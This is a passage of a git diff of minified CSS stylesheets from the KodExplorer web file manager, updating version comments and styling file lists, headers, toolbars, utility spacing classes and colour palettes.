i.font-icon:hover{background:rgba(0,0,0,0.05);color:#63acff;}.file-list-list .file.loading-children .ico .x-item-file,.file-list-split .file.loading-children .ico .x-item-file{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.file-list-list .file .filetype,.file-list-split .file .filetype{width:90px;}.file-list-list .file .filesize,.file-list-split .file .filesize{width:90px;text-align:right;padding-left:0px;padding-right:10px;}.file-list-list .file .filetime,.file-list-split .file .filetime{width:200px;}.file-list-list .file .filename,.file-list-split .file .filename{width:240px;word-break:break-all;padding-left:0px;}.file-list-list .file .filename .textarea,.file-list-split .file .filename .textarea{font-size:1.0em;display:inline-block;margin-left:-2px;}.file-list-list .file .filename #pathRenameTextarea,.file-list-list .file .filename .newfile,.file-list-split .file .filename #pathRenameTextarea,.file-list-split .file .filename .newfile{height:24px;line-height:24px;z-index:999;width:200px;min-width:150px;border:none;font-size:1.0em;padding-left:2px;padding-top:2px;}.file-list-list .file .filename #pathRenameTextarea:focus,.file-list-list .file .filename .newfile:focus,.file-list-split .file .filename #pathRenameTextarea:focus,.file-list-split .file .filename .newfile:focus{outline:none;}.file-list-list .file .filename .title,.file-list-split .file .filename .title{word-break:break-all;}.file-list-list .file .ico,.file-list-split .file .ico{height:20px;width:20px;padding:0px;line-height:20px;margin-right:4px;margin-top:4px;text-align:center;vertical-align:bottom;display:table-cell;}.file-list-list .file .ico img,.file-list-split .file .ico img{height:100% \9;max-height:100%;max-width:100%;}.file-list-list .file .filename .textarea{position:absolute;}.line-split-box{position:absolute;bottom:0px;right:0px;left:0px;top:0px;margin-top:0;overflow:hidden;}.line-split-box .split-line{border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);width:250px;float:left;height:100%;}.file-list-split{overflow:hidden;}.file-list-split .file{width:97.5%;height:24px;margin-left:0.7%;position:relative;}.file-list-split .file.file2{background:none;}.file-list-split .file .ico,.file-list-split .file .filename,.file-list-split .file .filetype,.file-list-split .file .filesize,.file-list-split .file .filetime,.file-list-split .file .children-open{line-height:22px;height:22px;}.file-list-split .file .ico{margin-left:5px;margin-top:3px;}.file-list-split .file .filename{width:100%;}.file-list-split .file .filename span.title{position:absolute;overflow:hidden;}.file-list-split .file .filename #pathRenameTextarea,.file-list-split .file .filename .newfile{height:23px;line-height:23px;}.file-list-split .file .filename .title .textarea{margin-top:-2px;}.file-list-split .file .children-open{width:20px;height:28px;text-align:center;padding-left:0px;background:rgba(255,255,255,0.4);position:absolute;right:0;}.file-list-split .file .children-open i.font-icon{font-size:1.25em;color:#aaa;display:inline-block;width:20px;line-height:28px;height:28px;font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;-webkit-font-smoothing:antialiased;}.file-list-split .file .children-open i.font-icon::before{content:"\f0da";line-height:24px;}.file-list-split .file.select-split-parent{background:#e3f0ff;}.file-list-split .file.select-split-parent .children-open i.font-icon::before{content:"\f101";font-size:20px;}.file-list-split .split-box{border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);width:250px;overflow:hidden;position:absolute;bottom:0px;left:0px;top:0px;border-bottom:5px solid transparent;}.file-list-split .split-box .content{overflow:auto;height:100%;margin:2px 0px 10px 0px;}.file-list-split .split-box.split-hover{background:#eef7ff;background:rgba(0,0,0,0.01);box-shadow:0 0 100px #eef7ff inset;border-bottom:5px solid #acd9ff;}.file-list-split .split-box.split-select{background:#dff0ff;background:rgba(0,0,0,0.01);box-shadow:0 0 40px #dff0ff inset;margin-left:-1px;border-left:1px solid #eee;border-color:#acd9ff;border-bottom:5px solid #2196F3;}.file-list-split .is-drag-split .split-drag{background:rgba(100,100,100,0.2);}.file-list-split .split-drag{position:absolute;top:0px;right:0px;bottom:0px;width:4px;cursor:col-resize;z-index:55;background:url("../../../images/common/resize.png") 2px 50% no-repeat;}.file-list-split .content-more{height:100px;position:relative;}.file-list-split .file .children-open i.font-icon{background:url("../../../images/common/tree.png") no-repeat 2px -350px \9\0;height:20px \9\0;}.file-list-split .file .children-open i.font-icon:before{display:none \9\0;}.file-list-split .file.select-split-parent .children-open i.font-icon{background:url("../../../images/common/tree.png") no-repeat -30px -350px \9\0;height:20px \9\0;}.file-list-list .file .children-more i.font-icon,.file-list-split .file .children-more i.font-icon{background:url("../../../images/common/tree.png") no-repeat 2px -350px \9\0;height:20px \9\0;}.file-list-list .file .children-more i.font-icon::after,.file-list-split .file .children-more i.font-icon::after{display:none \9\0;}.file-list-list .file .children-more i.font-icon.cert-open,.file-list-split .file .children-more i.font-icon.cert-open{background:url("../../../images/common/tree.png") no-repeat -15px -350px \9\0;}.file-list-list .file .children-more i.font-icon:hover,.file-list-split .file .children-more i.font-icon:hover{background:url("../../../images/common/tree.png") no-repeat -30px -350px \9\0;}.file-list-list .file .children-more i.font-icon.cert-open:hover,.file-list-split .file .children-more i.font-icon.cert-open:hover{background:url("../../../images/common/tree.png") no-repeat -47px -350px \9\0;}html,body{overflow:hidden;overflow-x:hidden;overflow-y:hidden;}.path-tips{line-height:23px;margin-left:15px;margin-top:1px;float:left;display:none;background:#ddd;color:#777;cursor:pointer;border-radius:3px;padding:1px 8px;position:relative;z-index:7;opacity:0.8;filter:alpha(opacity=80);}.role-label-box{padding:6px 0 0 10px;float:left;}.role-label-box .label{cursor:default;padding:4px 8px;}.frame-header .btn-group-sm >.btn,.frame-main .btn-group-sm >.btn{padding:3px 7px;}.button-style .btn-default{box-shadow:0 2px 8px rgba(0,0,0,0.05);border-radius:0px;height:26px;float:left;font-size:1em;-webkit-transition:border 0.2s;-moz-transition:border 0.2s;-o-transition:border 0.2s;-ms-transition:border 0.2s;transition:border 0.2s;overflow:hidden;padding:0 10px;border:solid 1px #ddd;margin:0 0 0 -1px;outline:none;}.button-style .btn-default .font-icon{line-height:22px;}.button-style .btn-default:hover,.button-style .btn-default:focus{color:#000;border-color:#aaa;-webkit-box-shadow:0 1px 10px rgba(0,0,0,0.2);-moz-box-shadow:0 1px 10px rgba(0,0,0,0.2);box-shadow:0 1px 10px rgba(0,0,0,0.2);}.button-style .btn-default:active{color:#000;border-color:#888;}.button-style .btn-left-radius{border-radius:3px 0px 0px 3px;}.button-style .btn-right-radius{border-radius:0px 3px 3px 0px;}.header-middle{padding-left:12px;}.header-middle .btn-default{box-shadow:0 2px 8px rgba(0,0,0,0.05);border-radius:0px;height:26px;float:left;font-size:1em;-webkit-transition:border 0.2s;-moz-transition:border 0.2s;-o-transition:border 0.2s;-ms-transition:border 0.2s;transition:border 0.2s;overflow:hidden;padding:0 10px;border:solid 1px #ddd;margin:0 0 0 -1px;outline:none;}.header-middle .btn-default .font-icon{line-height:22px;}.header-middle .btn-default:hover,.header-middle .btn-default:focus{color:#000;border-color:#aaa;-webkit-box-shadow:0 1px 10px rgba(0,0,0,0.2);-moz-box-shadow:0 1px 10px rgba(0,0,0,0.2);box-shadow:0 1px 10px rgba(0,0,0,0.2);}.header-middle .btn-default:active{color:#000;border-color:#888;}.header-middle .btn-left-radius{border-radius:3px 0px 0px 3px;}.header-middle .btn-right-radius{border-radius:0px 3px 3px 0px;}.header-middle #yarnball{width:50%;cursor:text;height:26px;overflow:hidden;float:left;border:1px solid #ddd;margin-left:-1px;box-shadow:#e6e6e6 0px 0px 20px inset;background:#f8f8f8;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;}.header-middle #yarnball .yarnball{list-style:none;margin:0;margin-top:-1px;padding:0;position:relative;}.header-middle #yarnball .yarnball .yarnlet{display:inline-block;float:left;}.header-middle #yarnball .yarnball .yarnlet a,.header-middle #yarnball .yarnball .yarnlet a:link,.header-middle #yarnball .yarnball .yarnlet a:visited{color:#666;display:inline-block;font-size:1em;padding:0px 15px 0px 20px;margin-left:-15px;position:relative;text-decoration:none;vertical-align:top;line-height:27px;}.header-middle #yarnball .yarnball .yarnlet.first a{margin-left:0px;padding-left:15px;}.header-middle #yarnball .yarnball .yarnlet a{background-image:url("../../../images/common/ybutton.png");background-repeat:no-repeat;background-position:100% 0;cursor:pointer;height:27px;}.header-middle #yarnball .yarnball .yarnlet a:hover{background-position:100% -48px;color:#333;}.header-middle #yarnball .yarnball .yarnlet a:active,.header-middle #yarnball .yarnball .yarnlet a.curDropToPath{background-position:100% -96px;color:#333;}.header-middle #yarnball .yarnball .yarnlet a.curDropToPath{color:#fff;background-position:100% -144px;}.header-middle #yarnball .yarnball .yarnlet .left-yarn{background:url("../../../images/common/ybutton.png") no-repeat 0 -2px;margin-left:-17px;padding:5px 6px 11px 4px;z-index:11;padding-top:5px \9;}.header-middle #yarnball .yarnball .yarnlet a:hover .left-yarn{background-position:0 -50px;}.header-middle #yarnball .yarnball .yarnlet a:active .left-yarn{background-position:0 -98px;}.header-middle #yarnball-input{height:26px;width:50%;cursor:text;float:left;border:1px solid #ddd;display:none;margin-left:-1px;background:#f8f8f8;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;box-shadow:#e6e6e6 0px 0px 20px inset;}.header-middle #yarnball-input input.path{border:none;height:25px;display:block;width:100%;padding:0;padding-left:10px;padding-right:10px;background:#f8f8f8;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;background:none;width:94%;font-size:1em;line-height:25px;color:#444;}.header-middle #yarnball-input input:focus{outline:none;}.header-middle .address-ico{display:inline-block;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;vertical-align:top;height:20px;width:20px;margin-right:5px;margin-top:0px;}.header-middle .address-ico img{height:100%;width:100%;max-width:100%;max-height:100%;}.frame-header{height:49px;width:100%;background:#f8f8f8;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;min-width:600px;border-bottom:1px solid #ddd;}.frame-header .header-content{padding-top:12px;}.frame-header .header-content button.btn{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;}.frame-header .header-content .disable .font-icon{opacity:0.4;filter:alpha(opacity=40);}.frame-header .header-content img{border:none;width:18px;height:18px;}.frame-header .header-content a{display:block;float:left;height:19px;height:25px\0;height:20px\9;}.frame-header .header-content .font-icon{font-size:1.25em;line-height:20px;padding:0 0px;}.frame-header .header-content #btn-history-back .font-icon,.frame-header .header-content #btn-history-next .font-icon{padding:0 5px;font-size:20px;}.frame-header .header-content .header-left{float:left;width:80px;padding-left:10px;}.frame-header .header-content .header-left button.disable{box-shadow:inset 0 3px 6px rgba(0,0,0,0.1);opacity:0.5;filter:alpha(opacity=50);}.frame-header .header-content .header-left button.disable .font-icon{color:#bbb;}.frame-header .header-content .header-right{position:absolute;right:20px;top:12px;}.frame-header .header-content .header-right .btn-default{box-shadow:0 2px 8px rgba(0,0,0,0.05);border-radius:0px;height:26px;float:left;font-size:1em;-webkit-transition:border 0.2s;-moz-transition:border 0.2s;-o-transition:border 0.2s;-ms-transition:border 0.2s;transition:border 0.2s;overflow:hidden;padding:0 10px;border:solid 1px #ddd;margin:0 0 0 -1px;outline:none;}.frame-header .header-content .header-right .btn-default .font-icon{line-height:22px;}.frame-header .header-content .header-right .btn-default:hover,.frame-header .header-content .header-right .btn-default:focus{color:#000;border-color:#aaa;-webkit-box-shadow:0 1px 10px rgba(0,0,0,0.2);-moz-box-shadow:0 1px 10px rgba(0,0,0,0.2);box-shadow:0 1px 10px rgba(0,0,0,0.2);}.frame-header .header-content .header-right .btn-default:active{color:#000;border-color:#888;}.frame-header .header-content .header-right .btn-left-radius{border-radius:3px 0px 0px 3px;}.frame-header .header-content .header-right .btn-right-radius{border-radius:0px 3px 3px 0px;}.frame-header .header-content .header-right input{display:block;float:left;border:1px solid #ddd;height:26px;height:26px \9;padding:0;padding-left:10px;padding-right:0px;text-shadow:1px 1px 3px #cce;color:#888;background:#f8f8f8;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;box-shadow:#e6e6e6 0px 0px 20px inset;outline:none;width:91px;-webkit-transition:all 0.218s;-moz-transition:all 0.218s;-o-transition:all 0.218s;-ms-transition:all 0.218s;transition:all 0.218s;}.frame-header .header-content .header-right input:focus{box-shadow:#ccc 0px 0px 20px inset;}.frame-main{position:absolute;left:0;right:0;top:40px;bottom:32px;}.frame-main .frame-left{position:absolute;left:0;top:0;bottom:0px;width:199px;border-right:1px solid #ddd;background:#fff;background-attachment:fixed;overflow:auto;z-index:10;}.frame-main .frame-left #folder-list-tree{position:absolute;width:100%;top:0px;bottom:85px;overflow:auto;}.frame-main .file-continer-more{width:1px;height:1px;position:absolute;top:0;}.frame-main .bottom-box{position:absolute;bottom:0px;width:100%;padding:5px 0;overflow:hidden;border-right:none;border-top:1px solid #f3f3f3;border-top:1px solid rgba(0,0,0,0.1);}.frame-main .bottom-box .box-content{padding-left:20px;}.frame-main .bottom-box .cell{background:#f8f8f8;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;display:block;border-radius:3px;float:left;text-align:center;color:#888;border:1px solid #ddd;width:65px;padding:2px 5px 0px 5px;margin-right:8px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.frame-main .bottom-box .cell i{display:block;font-size:25px;padding-bottom:0px;text-shadow:none;}.frame-main .bottom-box .cell.recycle-hover,.frame-main .bottom-box .cell.share-hover{background-position:0px -15px;border:1px solid #bbb;color:#666;box-shadow:0 0 4px #eee;cursor:pointer;}.frame-main .frame-resize{width:10px;cursor:col-resize;z-index:100;position:absolute;left:195px;top:0;bottom:0;overflow:hidden;background:url("../../../images/common/resize.png") 0px 50% no-repeat;}.frame-main .frame-resize.active{background:#000;opacity:0.2;filter:alpha(opacity=20);}.frame-main .frame-right{left:200px;right:0;position:absolute;top:0;bottom:0;overflow:hidden;min-width:450px;}.frame-main .frame-right .frame-right-main .font-icon{line-height:16px;padding:0 2px;font-size:1em;}.frame-main .frame-right .frame-right-main .drop-menu-action{min-width:150px;font-size:1em;}.frame-main .frame-right .frame-right-main .drop-menu-action a{padding:2px 30px;}.frame-main .frame-right .frame-right-main .drop-menu-action .divider{margin:5px 0;}.frame-main .frame-right .frame-right-main .drop-menu-action .disabled a{opacity:0.8;filter:alpha(opacity=80);}.frame-main .frame-right .frame-right-main .kod-toolbar-path .font-icon{padding-right:5px;}.frame-main .frame-right .frame-right-main .tools{z-index:100;height:34px;min-width:505px;border-bottom:1px solid #ddd;background:#fefefe;-webkit-box-shadow:1px 2px 15px #eee;-moz-box-shadow:1px 2px 15px #eee;box-shadow:1px 2px 15px #eee;}.frame-main .frame-right .frame-right-main .tools a.left:hover,.frame-main .frame-right .frame-right-main .tools a.middle:hover{margin-right:2px;padding-right:8px;}.frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-top-right-radius:3px;border-bottom-right-radius:3px;}.frame-main .frame-right .frame-right-main .tools a.this{background:#eee;cursor:default;}.frame-main .frame-right .frame-right-main .tools a.this:hover{margin-right:0px;padding-right:10px;border:1px solid #ddd;background:#eee;-webkit-box-shadow:0 2px 8px rgba(0,0,0,0.05);-moz-box-shadow:0 2px 8px rgba(0,0,0,0.05);box-shadow:0 2px 8px rgba(0,0,0,0.05);-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;}.frame-main .frame-right .frame-right-main .tools .tools-left{float:left;margin:4px 0 0 10px;width:100%;}.frame-main .frame-right .frame-right-main .tools .tools-left .btn-group{float:left;}.frame-main .frame-right .frame-right-main .tools .tools-left span.msg{display:none;margin-left:20px;float:left;padding-left:30px;font-size:1.1em;color:#888;height:25px;line-height:25px;background:url("../../../images/common/loading.gif") 4px 7px no-repeat;}.frame-main .frame-right .frame-right-main .tools .tools-right{margin:5px 20px 0 0;width:200px;position:absolute;right:0px;}.frame-main .frame-right .frame-right-main .tools .tools-right .btn-group-sm{float:right;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size{float:right;display:none;color:#bbb;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .dropdown-toggle{width:25px;height:25px;display:inline-block;cursor:pointer;line-height:25px;margin-right:5px;text-align:center;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size:hover,.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size.open{color:#888;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size:hover .dropdown-toggle,.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size.open .dropdown-toggle{background:#f6f6f6;border-radius:3px;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider{position:relative;margin-right:-34px;margin-top:30px;padding:10px 0;width:40px;min-width:10px;height:120px;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider.dropdown-menu:before{right:13px;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider.dropdown-menu:after{right:14px;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-bg{height:100%;width:5px;background:#ddd;margin-left:17px;border-radius:3px;cursor:pointer;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-handle{-webkit-transition:box-shadow 0.2s;-moz-transition:box-shadow 0.2s;-o-transition:box-shadow 0.2s;-ms-transition:box-shadow 0.2s;transition:box-shadow 0.2s;width:16px;height:16px;border-radius:10px;margin-top:10px;cursor:pointer;border-width:1px \9;border:2px solid #96dbfa;background:#fff;position:absolute;margin-left:10px;top:0px;left:0;}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-handle:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}.frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-handle.active{background:#7ed3f9;border-color:#7ed3f9;box-shadow:none;}.frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path{width:20px;text-decoration:none;padding:1px 10px;background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;display:inline-block;text-align:center;border-radius:3px;margin-left:10px;border:1px solid #ddd;}.frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path .font-icon{font-size:18px;line-height:20px;}.frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:hover{border:1px solid #999;}.frame-main .frame-right .dropdown-menu{font-size:1em;margin-top:5px;}.frame-main .frame-right .bodymain{position:absolute;zoom:1;z-index:0;top:85px;bottom:0;left:0;overflow:auto;width:100%;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;padding-bottom:40px;}.frame-main .frame-right .file-select-info{height:25px;background:#fff;color:#aaa;opacity:0.9;filter:alpha(opacity=90);position:absolute;bottom:5px;margin-left:0px;padding:0px 1em;font-size:1em;line-height:25px;}.frame-main .frame-right .file-select-info .item-num,.frame-main .frame-right .file-select-info .item-select{border-left:3px solid rgba(200,200,200,0.3);border-right:3px solid rgba(200,200,200,0.3);padding-left:5px;padding-right:5px;}.frame-main .frame-right .file-select-info .item-select{padding-left:0.5em;border-left:none;}.frame-main .path-is-null{text-align:center;color:#aaa;cursor:default;position:absolute;width:90%;margin-top:10%;}.frame-main .path-is-null:before{display:block;margin:0 auto;margin-bottom:0px;text-align:center;color:#ddd;font-size:60px;content:"\f115";font-family:FontAwesome;}.user-space-info{height:25spx;width:150px;color:#aaa;overflow:hidden;padding-left:20px;}.user-space-info .space-info-bar{width:150px;}.user-space-info .space-info-bar .space-process{width:150px;}.group-space-use{float:left;padding:2px 10px 0;color:#666;margin-top:-1px;background:url("../../../images/common/buttons_40.png") 0 7px repeat-x;margin-left:10px;border-radius:2px;border:1px solid #ddd;}.file-list-icon div.file{transition:all 0.2s ease 0s;} -/* ver 4.05(2017-08-26) [build 1503738069.5179] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100994.3851] */ \ No newline at end of file diff --git a/static/style/skin/base/app_setting.css b/static/style/skin/base/app_setting.css index 6f947c0..142995f 100755 --- a/static/style/skin/base/app_setting.css +++ b/static/style/skin/base/app_setting.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738070.2797] */ -body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;